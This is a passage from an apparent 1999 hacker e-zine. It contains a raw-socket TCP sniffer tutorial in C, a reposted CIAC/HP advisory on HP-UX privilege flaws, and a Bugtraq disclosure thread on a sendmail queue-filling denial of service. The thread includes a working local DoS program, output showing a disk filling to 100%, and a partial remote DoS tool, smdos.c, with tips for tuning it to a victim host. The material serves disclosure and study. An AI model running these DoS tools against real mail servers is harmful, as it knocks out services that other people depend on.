22. printf("IP header length ::: %d\n",ip->ip_length);
23. printf("Protocol ::: %d\n",ip->ip_protocol);
24. tcp = (struct tcp *)(buffer + (4*ip->ip_length));
25. printf("Source port ::: %d\n",ntohs(tcp->tcp_source_port);
26. printf("Dest port ::: %d\n",ntohs(tcp->tcp_dest_port));
27. }
28. }
/***********************EOF**********************************/
What this means :
Line 1-4 :
These are the header files required to use some needed c functions we will use later
<stdio.h> = functions like printf and std_out
<sys/socket.h> = this will give access to the SOCK_RAW and the
IPPROTO_TCP defines
<netinet/in.h> = structs like the sockaddr_in
<arpa/inet.h> = lets us use the functions to do network to host byte
order conversions
line 5 :
This is the header file headers.h that is also included with this program to give standard
structures to access the ip and tcp fields. The structures identify each field in the ip and
tcp header for instance :
struct ip {
unsigned int ip_length:4; /* length of ip-header in 32-bit
words*/
unsigned int ip_version:4; /* set to "4", for Ipv4 */
unsigned char ip_tos; /* type of service*/
unsigned short ip_total_length; /* Total length of ip datagram in
bytes */
unsigned short ip_id; /*identification field*/
unsigned short ip_flags;
unsigned char ip_ttl; /*time-to-live, sets upper limit
for max number of routers to
go through before the packet is
discarded*/
unsigned char ip_protocol; /*identifies the correct transport
protocol */
unsigned short ip_cksum; /*calculated for the ip header ONLY*/
unsigned int ip_source; /*source ip */
unsigned int ip_dest; /*dest ip*/
};
struct tcp {
unsigned short tcp_source_port; /*tcp source port*/
unsigned short tcp_dest_port; /*tcp dest port*/
unsigned int tcp_seqno; /*tcp sequence number,
identifies the byte in the
stream of data*/
unsigned int tcp_ackno; /*contains the next seq num that
the sender expects to recieve*/
unsigned int tcp_res1:4, /*little-endian*/
tcp_hlen:4, /*length of tcp header in 32-bit
words*/
tcp_fin:1, /*Finish flag "fin"*/
tcp_syn:1, /*Synchronize sequence
numbers to start a connection
tcp_rst:1, /*Reset flag */
tcp_psh:1, /*Push, sends data to the
application*/
tcp_ack:1, /*acknowledge*/
tcp_urg:1, /*urgent pointer*/
tcp_res2:2;
unsigned short tcp_winsize; /*maxinum number of bytes able
to recieve*/
unsigned short tcp_cksum; /*checksum to cover the tcp
header and data portion of the
packet*/
unsigned short tcp_urgent; /*vaild only if the urgent flag is
set, used to transmit
emergency data */
};
line 8-13 :
This is the variable declaration section
integers :
sock = socket file descriptor
bytes_recieved = bytes read from the open socket "sock"
fromlen = the size of the from structure char :
buffer = where the ip packet that is read off the
wire will be held buffer will hold a datagram
of 65535 bytes which is the maximum length
of an ip datagram.
Struct sockaddr_in :
struct sockaddr_in {
short int sin_family; /* Address family */
unsigned short int sin_port; /* Port number */
struct in_addr sin_addr; /* Internet address */
unsigned char sin_zero[8]; /* Same size as struct sockaddr */
};
Before we go any further two topics should be covered,byte-ordering and sockaddr
structures. Byte-ordering,is the way that the operating system stores bytes in memory.
There are two ways that this is done first with the low-order byte at the starting address
this is known as "little-endian" or host-byte order. Next bytes can be stored with the
high order byte at the starting address, this is called "big-endian" or network byte order.
The Internet protocol uses >>>>>> network byte order.
This is important because if you are working on an intel based linux box you will be
programming on a little-endian machine and to send data via ip you must convert the
bytes to network-byte order. For examle lets say we are going to store a 2-byte number
in memory say the value is (in hex) 0x0203
First this is how the value is stored on a big-endian machine:
___________
| 02 | 03 |
|_____|_____|
address: 0 1
And here is the same value on a little-endian machine:
___________
|03 | 02 |
|_____|_____|
address: 1 0
The same value is being represented in both examples it is just how we order the bytes
that changes.
The next topic that you must understand is the sockaddr vs. the sockaddr_in structures.
The struct sockaddr is used to hold information about the socket such as the family type
and other address information it looks like :
struct sockaddr {
unsigned short sa_family; /*address family*/
char sa_data[14]; /*address data*/
};
The first element in the structure "sa_family" will be used to reference what the family
type is for the socket, in our sniffer it will be AF_INET. Next the "sa_data" element
holds the destination port and address for the socket. To make it easier to deal with the
sockaddr struct the use of the sockaddr_in structure is commonly used. Sockaddr_in
makes it easier to reference all of the elements that are contained by sockaddr.
Sockaddr_in looks like:
struct sockaddr_in {
short int sin_family; /* Address family */
unsigned short int sin_port; /* Port number */
struct in_addr sin_addr; /* Internet address */
unsigned char sin_zero[8]; /* Same size as struct sockaddr */
};
We will use this struct and declare a variable "from" which will give us the information
on the packet that we will collect from the raw socket. For instance the var
"from.sin_addr" will give access to the packets source address (in
network byte order). The thing to mention here is that all items in the sockaddr_in
structure must be in network-byte order. When we receive the data in the sockaddr_in
struct we must then convert it back to Host-byte order. To do this we can use some
predefined functions to convert back and forth between host and network byteorder.
Here are the functions we will use:
ntohs : this function converts network byte order to host byte order
for a 16-bit short
ntohl : same as above but for a 32-bit long
inet_ntoa : this function converts a 32-bit network binary value to a
dotted decimal ip address
inet_aton : converts a character string address to the 32-bit network
binary value
inet_addr : takes a char string dotted decimal addr and returns a 32-bit
network binary value
To further illustrate ,say I want to know the port number that this packet originated from:
int packet_port; packet_port =ntohs(from.sin_port);
^^^^^
If I want the source IP address of the packet we will use a special function to get it to the
123.123.123.123 format:
char *ip_addr; ip_addr =inet_ntoa(from.sin_addr)
^^^^^^^^^
line 11-12:
struct ip *ip :
struct tcp *tcp :
This is a structure that we defined in our header file "headers.h". This structure is
declared so that we can access individual fields of the ip/tcp header. The structure is like
a transparent slide with predefined fields drawn on it. When a packet is taken off
the wire it is a stream of bits, to make sense of it the "transparency" (or cast) is laid on
top of or over the bits so the individual fields can be referenced.
Line 14 :
sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
This is the most important line in the entire program. Socket() takes three arguments in
this form:
sockfd = socket(int family, int type, int protocol);
The first argument is the family. This could be either AF_UNIX which is used so a process
can communicate with another process on the same host or AF_INET which is used for
internet communication between remote hosts. In this case it will be AF_INET . Next
is the type, the type is usually between 1 of 4 choices (there are others that we will not
discuss here) the main four are :
1. SOCK_DRAM : used for udp datagrams
2. SOCK_STREAM : used for tcp packets
3. SOCK_RAW : used to bypass the transport layer
and directly access the IP layer
4. SOCK_PACKET : this is linux specific, it is similuar to
SOCK_RAW except it accesses the DATA LINK Layer
For our needs we will use the SOCK_RAW type. You must have root acces to open a
raw socket. The last parameter is the protocol,the protocol value specifies what type of
traffic the socket should receive , for normal sockets this value is usally set to "0"
because the socket can figure out if for instance the "type" of SOCK_DGRAM is
specified then the protocol should be UDP.In our case we just want to look at tcp
traffic so we will specify IPPROTO_TCP.
line 15 :
while (1)
The while (1) puts the program into an infinite loop this is necessary so that after the
first packet is processed we will loop around and grab the next.
Line 18:
bytes_recieved = recvfrom(sock, buffer, sizeof buffer, 0, (struct sockaddr *)&from, &fromlen);
Now here is where we are actually reading data from the open socket "sock".The from
struct is also filled in but notice that we are casting "from" from a "sockaddr_in" struct
to a "sockaddr" struct. We do this because the recvfrom() requires a sockaddr type but
to access the separate fields we will continue to use the sockaddr_in structure. The
length of the "from" struct must also be present and passed by address. The recvfrom()
call will return the number of bytes on success and a -1 on error and fill the global var
errno.
This is what we call "blocking-I/O" the recvfrom() will wait here forever until a
datagram on the open socket is ready to be processed. This is opposed to
Non-blocking I/O which is like running a process in the background and move on to
other tasks.
Line 20:
printf("Source address ::: %s\n",inet_ntoa(from.sin_addr));
This printf uses the special function inet_ntoa() to take the value of "from.sin_addr"
which is stored in Network-byte order and outputs a value in a readable ip form such
as 192.168.1.XXX.
Line 21:
ip = (struct ip *)buffer;
This is where we will overlay a predefined structure that will help us to individually
identify the fields in the packet that we pick up from the open socket.
Line 22:
printf("IP header length ::: %d\n",ip->ip_length);
The thing to notice on this line is the "ip->ip_length" this will access a pointer in
memory to the ip header length the important thing to remember is that the length
will be represented in 4-byte words this will be more important later when trying to
access items past the ip header such as the tcp header or the data portion of the packet.
Line 23:
printf("Protocol ::: %d\n",ip->ip_protocol);
This gives access to the type of protocol such as 6 for tcp or 17 for udp.
Line 24:
tcp = (struct tcp *)(buffer + (4*ip->ip_length));
Remember earlier it was mentioned that the ip header length is stored in 4 byte words,
this is where that bit of information becomes important. Here we are trying to get access
to the tcp header fields, to do this we must overlay a structure that has the fields
predefined just as we did with ip. There is one key difference here the ip header fields
were easy to access due to the fact that the beginning of the buffer was also the beginning
of the ip header as so :
|----------------- buffer ----------------|
_________________________________________
| ip header | |
|____________________|____________________|
^
*ip
^
*buffer
So to get access to the ip header we just set a pointer casted as an ip structure to the
beginning of the buffer like "ip = (struct ip *)buffer;". To get access to the tcp header
is a little more difficult due to the fact that we must set a pointer and cast it as a tcp
structure at the beginning of the tcp header which follows the ip header in the buffer
as so :
|----------------- buffer ---------------|
________________________________________
| ip header | tcp header | |
|___________|____________|_______________|
^
*tcp
This is why we use 4*ip->ip_length to find the start of the tcp header.
Line 25-26:
printf("Source port ::: %d\n",ntohs(tcp->tcp_source_port);
printf("Dest port ::: %d\n",ntohs(tcp->tcp_dest_port));
We can now access the source and dest ports which are located in the tcp header via
the structure as defined above.
This will conclude our first very simple tcp sniffer. This was a very basic application
that should help define how to access packets passing on the network and how to use
sockets to access the packets. Hopefully this will be the first of many papers to come,
which each proceeding paper we will add a new or more complex feature to the sniffer. I
should also mention that there a number of great resources on the net that should aid you
in further research in this area :
1. Beej's Guide to Network Programming
This is an awesome paper that really helps
clear up any misconceptions about network programming.
[http://www.ecst.csuchico.edu/~beej/guide/net]
2. TCP/IP Illustrated Vol 1,2,3
W.Richard Stevens
To use the above program, cut out the above code and strip off all
of the line numbers. Save the edited file as sniff.c. Next cut
out the header file headers.h (below) and save it to a file headers.h
in the same directory. Now just compile: gcc -o sniff sniff.c
You should now have the executable "sniff", to run it type
#./sniff
/*************************headers.h**************************/
/*structure of an ip header */
struct ip {
unsigned int ip_length:4; /*little-endian*/
unsigned int ip_version:4;
unsigned char ip_tos;
unsigned short ip_total_length;
unsigned short ip_id;
unsigned short ip_flags;
unsigned char ip_ttl;
unsigned char ip_protocol;
unsigned short ip_cksum;
unsigned int ip_source;
unsigned int ip_dest;
};
/* Structure of a TCP header */
struct tcp {
unsigned short tcp_source_port;
unsigned short tcp_dest_port;
unsigned int tcp_seqno;
unsigned int tcp_ackno;
unsigned int tcp_res1:4, /*little-endian*/
tcp_hlen:4,
tcp_fin:1,
tcp_syn:1,
tcp_rst:1,
tcp_psh:1,
tcp_ack:1,
tcp_urg:1,
tcp_res2:2;
unsigned short tcp_winsize;
unsigned short tcp_cksum;
unsigned short tcp_urgent;
};
/*********************EOF***********************************/
*
@HWA
09.0 CIAC Security advisory on HP-UX ftp,hpterm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Missed this is last issue, go figure I was having a month....
Date: Wed, 31 Mar 1999 11:30:48 -0800 (PST)
From: CIAC Mail User <ciac@rumpole.llnl.gov>
To: ciac-bulletin@rumpole.llnl.gov
Subject: CIAC Bulletin J-038: HP-UX Vulnerabilities (hpterm, ftp)
[ For Public Release ]
-----BEGIN PGP SIGNED MESSAGE-----
__________________________________________________________
The U.S. Department of Energy
Computer Incident Advisory Capability
___ __ __ _ ___
/ | /_\ /
\___ __|__ / \ \___
__________________________________________________________
INFORMATION BULLETIN
HP-UX Vulnerabilities (hpterm, ftp)
H-P Security Bulletins #00093 and #00094
March 31, 1999 15:00 GMT Number J-038
______________________________________________________________________________
PROBLEM: Two vulnerabilities have been identified by Hewlett-Packard
Company.
1) PHSS_13560 introduced a library access problem into hpterm.
2) There is a Security Vulnerability during ftp operations.
PLATFORM: 1) HP9000 Series 700 and Series 800, HP-UX release 10.20 only.
2) HP9000 Series 7/800 running HP-UX release 11.00 only.
DAMAGE: Users can gain increased privileges.
SOLUTION: Apply patches.
______________________________________________________________________________
VULNERABILITY Risk is high. Both of these vulnerabilities affect systems
ASSESSMENT: security. Patches should be applied as soon as possible.
______________________________________________________________________________
[Start Hewlett-Packard Company Advisory]
1) PHSS_13560
Document ID: HPSBUX9903-093
Date Loaded: 19990317
Title: Security Vulnerability with hpterm on HP-UX 10.20
- -----------------------------------------------------------------------
HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00093, 18 March 1999
- -----------------------------------------------------------------------
The information in the following Security Bulletin should be acted upon
as soon as possible. Hewlett-Packard Company will not be liable for any
consequences to any customer resulting from customer's failure to fully
implement instructions in this Security Bulletin as soon as possible.
- -----------------------------------------------------------------------
PROBLEM: PHSS_13560 introduced a library access problem into hpterm.
PLATFORM: HP9000 Series 700 and Series 800, HP-UX release 10.20 only.
DAMAGE: Users can gain increased privileges.
SOLUTION: Install PHSS_17830.
AVAILABILITY: The patch is available now.
- -----------------------------------------------------------------------
I.
A. Background
PHSS_13560 introduced a library access problem into hpterm, the
terminal emulator for the X Window system. (See hpterm(1)).
B. Fixing the problem
Installing patch PHSS_17830 completely fixes this problem.
NOTE: Three older hpterm patches have been released including
PHSS_13560, PHSS_15431, and PHSS_17332. All of these older
patches are being superseded with the release of the
PHSS_17830.
Do not use PHSS_13560, PHSS_15431, or PHSS_17332.
C. To subscribe to automatically receive future NEW HP Security
Bulletins from the HP Electronic Support Center via electronic
mail, do the following:
Use your browser to get to the HP Electronic Support Center page
at:
http://us-support.external.hp.com
(for US, Canada, Asia-Pacific, & Latin-America)
http://europe-support.external.hp.com (for Europe)
Login with your user ID and password (or register for one).
Remember to save the User ID assigned to you, and your password.
Once you are in the Main Menu:
To -subscribe- to future HP Security Bulletins,
click on "Support Information Digests".
To -review- bulletins already released from the main Menu,
click on the "Technical Knowledge Database (Security Bulletins
only)".
Near the bottom of the next page, click on "Browse the HP Security
Bulletin Archive".
Once in the archive there is another link to our current Security
Patch Matrix. Updated daily, this matrix categorizes security
patches by platform/OS release, and by bulletin topic.
The security patch matrix is also available via anonymous ftp:
us-ffs.external.hp.com
~ftp/export/patches/hp-ux_patch_matrix
D. To report new security vulnerabilities, send email to
security-alert@hp.com
Please encrypt any exploit information using the security-alert
PGP key, available from your local key server, or by sending a
message with a -subject- (not body) of 'get key' (no quotes) to
security-alert@hp.com.
Permission is granted for copying and circulating this Bulletin to
Hewlett-Packard (HP) customers (or the Internet community) for the
purpose of alerting them to problems, if and only if, the Bulletin
is not edited or changed in any way, is attributed to HP, and
provided such reproduction and/or distribution is performed for
non-commercial purposes.
Any other use of this information is prohibited. HP is not liable
for any misuse of this information by any third party.
_____________________________________________________________________
- ---End of Document ID: HPSBUX9903-093---------------------------------
2) ftp
Document ID: HPSBUX9903-094
Date Loaded: 19990323
Title: Security Vulnerability with ftp on HP-UX 11.00
- -----------------------------------------------------------------------
HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00094, 24 March 1999
- -----------------------------------------------------------------------
The information in the following Security Bulletin should be acted upon
as soon as possible. Hewlett-Packard Company will not be liable for any
consequences to any customer resulting from customer's failure to fully
implement instructions in this Security Bulletin as soon as possible.
- -----------------------------------------------------------------------
PROBLEM: Security Vulnerability during ftp operations.
PLATFORM: HP9000 Series 7/800 running HP-UX release 11.00 only.
DAMAGE: Users can increase privileges
SOLUTION: Apply the patch specified below
AVAILABILITY: The patch is available now.
- -----------------------------------------------------------------------
I.
A. Background
Hewlett-Packard Company has found that during normal operations,
the ftp program might grant users increased privileges.
B. Fixing the problem
Obtaining and installing the following patch will completely close
this vulnerability. Rebooting the system will NOT be required.
For all HP9000 S7/800 platforms running HP-UX 11.00: PHCO_17601
C. To subscribe to automatically receive future NEW HP Security
Bulletins or access the HP Electronic Support Center, use your
browser to get to our ESC web page at:
http://us-support.external.hp.com (for non-European locations),
or http://europe-support.external.hp.com (for Europe)
Login with your user ID and password (or register for one).
Remember to save the User ID/password assigned to you.
Once you are in the Main Menu:
To -subscribe- to future HP Security Bulletins,
click on "Support Information Digests".
To -review Security bulletins already released-,
click on the "Search Technical Knowledge Database."
To -retrieve patches-, click on "Individual Patches" and select
appropriate release and locate with the patch identifier (ID).
To -browse the HP Security Bulletin Archive-, select the link at
the bottom of the page once in the "Support Information Digests".
To -view the Security Patch Matrix-, (updated daily) which
categorizes security patches by platform/OS release, and by
bulletin topic, go to the archive (above) and follow the links.
The security patch matrix is also available via anonymous ftp:
us-ffs.external.hp.com or ~ftp/export/patches/hp-ux_patch_matrix
D. To report new security vulnerabilities, send email to
security-alert@hp.com
Please encrypt any exploit information using the security-alert
PGP key, available from your local key server, or by sending a
message with a -subject- (not body) of 'get key' (no quotes) to
security-alert@hp.com.
Permission is granted for copying and circulating this Bulletin to
Hewlett-Packard (HP) customers (or the Internet community) for the
purpose of alerting them to problems, if and only if, the Bulletin
is not edited or changed in any way, is attributed to HP, and
provided such reproduction and/or distribution is performed for
non-commercial purposes.
Any other use of this information is prohibited. HP is not liable
for any misuse of this information by any third party.
______________________________________________________________________
- ---End of Document ID: HPSBUX9903-094---------------------------------
[End Hewlett-Packard Company Advisory]
___________________________________________________________________________
CIAC wishes to acknowledge the contributions of Hewlett-Packard Company for
the information contained in this bulletin.
___________________________________________________________________________
CIAC, the Computer Incident Advisory Capability, is the computer
security incident response team for the U.S. Department of Energy
(DOE) and the emergency backup response team for the National
Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
National Laboratory in Livermore, California. CIAC is also a founding
member of FIRST, the Forum of Incident Response and Security Teams, a
global organization established to foster cooperation and coordination
among computer security teams worldwide.
CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
can be contacted at:
Voice: +1 925-422-8193
FAX: +1 925-423-8002
STU-III: +1 925-423-2604
E-mail: ciac@llnl.gov
For emergencies and off-hour assistance, DOE, DOE contractor sites,
and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
8AM PST), call the CIAC voice number 925-422-8193 and leave a message,
or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two
Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC
duty person, and the secondary PIN number, 8550074 is for the CIAC
Project Leader.
Previous CIAC notices, anti-virus software, and other information are
available from the CIAC Computer Security Archive.
World Wide Web: http://www.ciac.org/
(or http://ciac.llnl.gov -- they're the same machine)
Anonymous FTP: ftp.ciac.org
(or ciac.llnl.gov -- they're the same machine)
Modem access: +1 (925) 423-4753 (28.8K baud)
+1 (925) 423-3331 (28.8K baud)
CIAC has several self-subscribing mailing lists for electronic
publications:
1. CIAC-BULLETIN for Advisories, highest priority - time critical
information and Bulletins, important computer security information;
2. SPI-ANNOUNCE for official news about Security Profile Inspector
(SPI) software updates, new features, distribution and
availability;
3. SPI-NOTES, for discussion of problems and solutions regarding the
use of SPI products.
Our mailing lists are managed by a public domain software package
called Majordomo, which ignores E-mail header subject lines. To
subscribe (add yourself) to one of our mailing lists, send the
following request as the E-mail message body, substituting
ciac-bulletin, spi-announce OR spi-notes for list-name:
E-mail to ciac-listproc@llnl.gov or majordomo@tholia.llnl.gov:
subscribe list-name
e.g., subscribe ciac-bulletin
You will receive an acknowledgment email immediately with a confirmation
that you will need to mail back to the addresses above, as per the
instructions in the email. This is a partial protection to make sure
you are really the one who asked to be signed up for the list in question.
If you include the word 'help' in the body of an email to the above address,
it will also send back an information file on how to subscribe/unsubscribe,
get past issues of CIAC bulletins via email, etc.
PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins. If you are not part of these
communities, please contact your agency's response team to report
incidents. Your agency's team will coordinate with CIAC. The Forum of
Incident Response and Security Teams (FIRST) is a world-wide
organization. A list of FIRST member organizations and their
constituencies can be obtained via WWW at http://www.first.org/.
This document was prepared as an account of work sponsored by an
agency of the United States Government. Neither the United States
Government nor the University of California nor any of their
employees, makes any warranty, express or implied, or assumes any
legal liability or responsibility for the accuracy, completeness, or
usefulness of any information, apparatus, product, or process
disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products,
process, or service by trade name, trademark, manufacturer, or
otherwise, does not necessarily constitute or imply its endorsement,
recommendation or favoring by the United States Government or the
University of California. The views and opinions of authors expressed
herein do not necessarily state or reflect those of the United States
Government or the University of California, and shall not be used for
advertising or product endorsement purposes.
LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)
J-027: Digital Unix Vulnerabilities ( at , inc )
J-028: Sun Solaris Vulnerabilities (sdtcm_convert, man/catman, CDE)
J-029: Buffer Overflows in Various FTP Servers
J-030: Microsoft BackOffice Vulnerability
J-031: Debian Linux "Super" package Buffer Overflow
J-032: Windows Backdoors Update II:
J-034: Cisco 7xx TCP and HTTP Vulnerabilities
J-035: Linux Blind TCP Spoofing
J-036: LDAP Buffer overflow against Microsoft Directory Services
J-037: W97M.Melissa Word Macro Virus
-----BEGIN PGP SIGNATURE-----
Version: 4.0 Business Edition
iQCVAwUBNwJkHLnzJzdsy3QZAQHrWAP9E27Nc3P8XLWJ1IM/JOzMdHy5mvymnUdh
dzkEuldX35r+KGPlZYGxAq6NbKeYQFgi24C1OHg7V/MhcgnXKHPB6DN7Zdd6g6ii
sUAnZ7LD3MqQb7OIMq2D3GdWzLzn/u5qpanKt1VjNYtQCGi4RbH9YgJFnLFgma8I
dX/jer4bE6M=
=Q2lE
-----END PGP SIGNATURE-----
@HWA
10.0 Sendmail DoS on versions up to the latest version 8.9.3
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 1 Apr 1999 14:00:16 +0000
From: Lukasz Luzar <lluzar@NONAME.KKI.KRAKOW.PL>
To: BUGTRAQ@netspace.org
Subject: Possible local DoS in sendmail
Hi,
It seems that sendmail ran with -t option does NOT block SIGINT ...
In that moment while we are sending data to its stdin, when we will press
CTRL-C process is being killed, but in queue rests unfinished letter.
It stays there quite long - long enought to fullfill partition on disk where
/var/spool/mqueue resides.
When it happends, sendmail doesn't allow new connections - so it is a kind
of DoS attack for this service.
It has been tested on all new versions on sendmail up to current (8.9.3).
Example ...
--- CUT HERE ----
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <sys/wait.h>
#define DELAY 5 /* time in seconds needed to reach
MaxMessageSize limit */
#define SM_PATH "/usr/sbin/sendmail -t"
void main()
{
FILE *fd;
int pid;
for(;;) {
if(( pid = fork()) == 0) {
setpgrp();
if(( fd = popen( SM_PATH, "w")) == NULL)
fprintf( stderr, "popen error\n");
for(;;) fputc( 'A', fd);
} else {
sleep( DELAY);
kill( (-1) * pid, SIGINT);
fprintf( stdout, "next\n");
wait( NULL);
}
}
}
--- CUT HERE ---
Regards,
---
Lukasz Luzar K.K.I.
http://noname.kki.krakow.pl/ lluzar@kki.pl
---------------------------------------------------------------------
Date: Thu, 1 Apr 1999 14:41:41 -0500
From: KuRuPTioN <kuruption@CHA0S.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Possible local DoS in sendmail
Well, this is very interesting... this is what I found my running this
binary for 30 seconds =)
Before:
# df /
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/hda1 303251 87681 199909 30% /
# ps auwx | grep sendmail
root 1427 0.0 0.4 1324 816 ? S Mar 27 0:00 sendmail:
accepting connections on port 25
# ls -l /var/spool/mqueue
total 0
#
After (30 seconds running):
# df /
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/hda1 303251 107548 180042 37% /
(not too bad but another 30 seconds later another df)
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/hda1 303251 146235 141355 51% /
# ps auwx | grep sendmail
mail 17144 70.5 0.4 1348 820 p1 R 11:35 0:48
/usr/sbin/sendmail -t
root 1427 0.0 0.4 1324 816 ? S Mar 27 0:00 sendmail:
accepting connections on port 25
(sendmail kindly using 70% of my CPU)
# ls -l /var/spool/mqueue
total 115854
-rw------- 1 mail mail 118169600 Apr 1 11:37 dfLAA17144
-rw------- 1 mail mail 0 Apr 1 11:35 qfLAA17144
-rw------- 1 mail mail 0 Apr 1 11:35 xfLAA17144
(once again a df)
# df /
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/hda1 303251 224734 62856 78% /
and once the hard drive becomes filled sendmail stops accepting connections
since it has no temp space.
# df /
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/hda1 303251 287590 0 100% /
# ps auwx | grep sendmail
mail 17144 68.5 0.4 1348 820 p1 R 11:35 2:33
/usr/wrapped/sendmail -t
root 1427 0.0 0.4 1324 816 ? S Mar 27 0:00 sendmail:
rejecting connections on port 25: min free: 100
#
People, this is no april fools joke =)
Raymond T Sundland
MCSE, MCP, MCP+Internet
PGP Key: finger pgp@24.3.181.22
-----------------------------------------------------------------------------------
Date: Fri, 2 Apr 1999 10:23:26 -0800
From: Gregory Neil Shapiro <gshapiro@SENDMAIL.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Possible local DoS in sendmail
-----BEGIN PGP SIGNED MESSAGE-----
Lukasz> In that moment while we are sending data to its stdin, when we will
Lukasz> press CTRL-C process is being killed, but in queue rests unfinished
Lukasz> letter. It stays there quite long - long enought to fullfill
Lukasz> partition on disk where /var/spool/mqueue resides. When it
Lukasz> happends, sendmail doesn't allow new connections - so it is a kind
Lukasz> of DoS attack for this service. It has been tested on all new
Lukasz> versions on sendmail up to current (8.9.3).
Thanks for posting this info Lukasz.
Unfortunately we believe this is just a variation on the many Denial of
Service attacks possible from a Unix shell. In fact, it's "yet another
queue filling" exercise. This problem affects most, if not all MTAs.
Interestingly, the proposed DOS is less severe than the usual queue filling
strategies such as repeatedly submitting large mails to an undeliverable
address, such as someone@[10.255.255.255].
The reason for this is that the derelict files will be removed by the next
scheduled queue run. In the case of legitimately queued mail, it will take
the full queue return timeout before the queue entry is removed (assuming a
lack of intervention on the administrator's part).
The valid point you do raise is that shell-based DOS attacks are hard to
deal with. In many cases, the only recourse is to identify and stop the
offender.
In this case we suggest that if this attack is a possibility at your site,
you use process accounting to help trace the malicious user. Also, unless
your script gets the timing exactly right every time, the queue submission
will complete which will give more information about the identity of the
attacker. As a side note, setting the MaxMessageSize option prevents any
one message from filling the queue.
Having said that, it does point out that sendmail could log the username
and queue ID earlier to help make tracing this sort of attack even easier.
We will look into the benefits of doing this for a future release.
Lukasz as a final point, we really appreciate you raising this issue but in
the future, we would prefer some consultation prior to posting to bugtraq.
This will allow us to have all of the information available at the time of
the posting. The address to contact us is sendmail-bugs@sendmail.org.
Conclusion. Queue filling DOS attacks are not unique to sendmail. This is
not a new problem. There is no general solution to this and many other DOS
attacks apart from identifying and stopping the malicious user.
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0 for non-commercial use
Comment: Processed by Mailcrypt 3.5.3, an Emacs/PGP interface
Charset: noconv
iQCVAwUBNwUKvXxLZ22gDhVjAQEv9QP9EgU5zmNeAZ63tUiRoq3C6OSbXEJ4yvw4
PLCkOWUJ4etCzBKa5i1/SCa9/mW+WHmR3WobNCI5m8Y9AqYjSSe+gQgnWXXH5CJH
fRgtRNrvVewAIsW84QRQDFdapLPiq4ZZbEu7w55WNVdgnZwwTqXGeLJEgP+cAcTl
ehf8dKqtahk=
=7/+l
-----END PGP SIGNATURE-----
Date: Sat, 3 Apr 1999 00:42:56 +0200
From: "[iso-8859-2] Micha� Szyma�ski" <siwa9@BOX43.GNET.PL>
To: BUGTRAQ@netspace.org
Subject: Re: Possible local DoS in sendmail
Hi folks,
This local queue filling DoS attack in sendmail is quite dangerous. But good
security policy (like mine) will prevent attackers from doing such things.
Control files (in /var/spool/mqueue) created by 'sendmail -t' are owned by
root.attacker's_group; turn on quotas for group 'attacker's_group' on the
file system containing /var/spool/mqueue directory, and your host will be not
vulnerable; but you _have to_ configure your sendmail as _nosuid_ daemon;
Much more dangerous are remote queue filling DoS attacks. If you have enabled
relaying, you can use shown below smdos.c proggie; it will quite fast fullfill
partition on disk where /var/spool/mqueue resides. you should notice increased
LA during attack; in contrast to local DoS attacks, control files created by
smdos.c are owned by root.root, so ... it's much more difficult to prevent
offenders from doing it;
don't forget to change BSIZE definition (in smdos.c) to appropriate victim's
host message size limitation (MaxMessageSize option); you can also increase
MAXCONN definition.
smdos.c:
--- CUT HERE ---
/*
By Michal Szymanski <siwa9@box43.gnet.pl>
Sendmail DoS (up to 8.9.3);
Sat Apr 3 00:12:31 CEST 1999
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>
#undef VERBOSE /* define it, if MORECONN is undefined */
#define MORECONN
// #define RCPT_TO "foo@ftp.onet.pl"
#define RCPT_TO "foo@10.255.255.255"
#ifdef MORECONN
#define MAXCONN 5
#endif
#define BSIZE 1048576 /* df* control file size */
#define PORT 25
char buffer[BSIZE];
int sockfd,x,loop,chpid;
void usage(char *fname) {
fprintf(stderr,"Usage: %s <victim_host>\n",fname);
exit(1);
}
void say(char *what) {
if (write(sockfd,what,strlen(what))<0) {
perror("write()");
exit(errno);
}
#ifdef VERBOSE
fprintf(stderr,"<%s",what);
#endif
bzero(buffer,BSIZE);
usleep(1000);
if (read(sockfd,buffer,BSIZE)<0) {
perror("read()");
exit(errno);
}
#ifdef VERBOSE
fprintf(stderr,buffer);
#endif
}
int main(int argc,char *argv[]) {
struct sockaddr_in serv_addr;
struct hostent *host;
char *hostname,hostaddr[20];
fprintf(stderr,"Sendmail DoS (up to 8.9.3) by siwa9 [siwa9@box43.gnet.pl]\n");
if (argc<2) usage(argv[0]);
#ifdef VERBOSE
fprintf(stderr,">Preparing address. \n");
#endif
hostname=argv[1];
serv_addr.sin_port=htons(PORT);
serv_addr.sin_family=AF_INET;
if ((serv_addr.sin_addr.s_addr=inet_addr(hostname))==-1) {
#ifdef VERBOSE
fprintf(stderr,">Getting info from DNS.\n");
#endif
if ((host=gethostbyname(hostname))==NULL) {
herror("gethostbyname()");
exit(h_errno);
}
serv_addr.sin_family=host->h_addrtype;
bcopy(host->h_addr,(char *)&serv_addr.sin_addr,host->h_length);
#ifdef VERBOSE
fprintf(stderr,">Official name of host: %s\n",host->h_name);
#endif
hostname=host->h_name;
sprintf(hostaddr,"%d.%d.%d.%d",(unsigned char)host->h_addr[0],
(unsigned char)host->h_addr[1],
